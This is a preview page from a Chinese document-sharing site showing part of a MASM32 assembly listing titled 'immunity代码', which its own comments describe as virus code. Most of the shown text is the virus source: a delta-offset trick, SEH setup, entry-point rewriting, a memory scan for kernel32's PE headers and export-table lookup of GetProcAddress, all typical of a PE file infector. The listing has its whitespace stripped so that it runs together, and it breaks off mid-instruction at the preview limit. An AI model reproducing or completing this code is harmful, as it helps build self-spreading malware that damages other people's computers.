返回
immunity代码(柴婷婷)

immunity代码(柴婷婷)

ID:38258507

大小:22.54 KB

页数:18页

时间:2019-06-07

immunity代码(柴婷婷)_第1页
immunity代码(柴婷婷)_第2页
immunity代码(柴婷婷)_第3页
immunity代码(柴婷婷)_第4页
immunity代码(柴婷婷)_第5页
资源描述:

《immunity代码(柴婷婷)》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、.386.modelflat,stdcalloptioncasemap:noneincludemasm32includewindows.incincludemasm32includekernel32.incincludemasm32includeuser32.incincludelibmasm32libkernel32.libincludelibmasm32libuser32.lib;这是一些相关的定义,;------------------------------------(上面的)--.datamc

2、aptiondb"你好!!!!!!!!!!1!",0mtitledb"*标题*",0;主程序所用到的一些变量;------------------------------------(上面的)--.codehost_start:invokeMessageBox,NULL,offsetmcaption,offsetmtitle,64invokeExitProcess,0;主程序代码,只是简单的打一串字符而已。;病毒代码运行完后,就会跳到此处执行。;------------------------------------(上面的)--Im

3、munitySEGMENTPARAUSE32'Immunity'assumecs:Immunity,ds:Immunityvstart:pushebppushespcallnstartnstart:;;;;;;;;;;;;;popebpsubebp,offsetnstart;病毒中常用的一种方法。得到一个偏移差。;程序后面用到的所有变量都需要加上个这偏移差;------------------------------------(上面的)--assumefs:nothing;设置SEH,发生异常可以直接返回原入口.leaebx,SEH

4、[ebp]pushebxpushfs:[0]movfs:[0],espmovOldEsp[ebp],esp;=========================;*更改程序入口地址*cmpold_base[ebp],0jnzgonextmovold_base[ebp],400000hgonext:cmpold_in[ebp],0jnzchangemovold_in[ebp],1000hchange:moveax,old_base[ebp]movdes_base[ebp],eaxmoveax,old_in[ebp]movdes_in[eb

5、p],eax;变量定义的的意思见后方;程序开始执行时,当前程序的原入口地址会放到old_base+old_in中;由于程序中old_base_in有别的用途,因此将此地址存放到;des_base_in,以便最后跳回原程序入口。;------------------------------------(上面的)--;获得KERNEL32地址及所需的API函数地址moveax,[esp+10h];//取Kernel32返回地址andax,0f000hmovesi,eax;//得到Kernel.PELoader代码位置(不精确)LoopFi

6、ndKernel32:subesi,1000hcmpwordptr[esi],'ZM';//搜索EXE文件头jnzshortLoopFindKernel32GetPeHeader:movzxedi,wordptr[esi+3ch]addedi,esicmpwordptr[edi],'EP';//确认是否PE文件头jnzshortLoopFindKernel32;esi->kernel32,edi->kernel32PEHEADER;//////////////////////////////////////////////////查找

7、GetProcAddress函数地址movvKernel32[ebp],esiGetPeExportTable:movebx,[edi+78h];4+14h+60haddebx,vKernel32[ebp];//得到输出函数表movvExportKernel[ebp],ebxpush14callaGetProcAddrdb"GetProcAddress",0aGetProcAddr:leaeax,GetApiAddress[ebp]calleaxoreax,eaxjzExitTimesmovvGetProcAddress[ebp],e

8、ax;得到GetProcAddress地址leaesi,bGetModuleHandle[ebp];获得所有用到的KERNEL32函数的地址leaedi,vGetModuleHandle[ebp]cldComeOn:lo

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。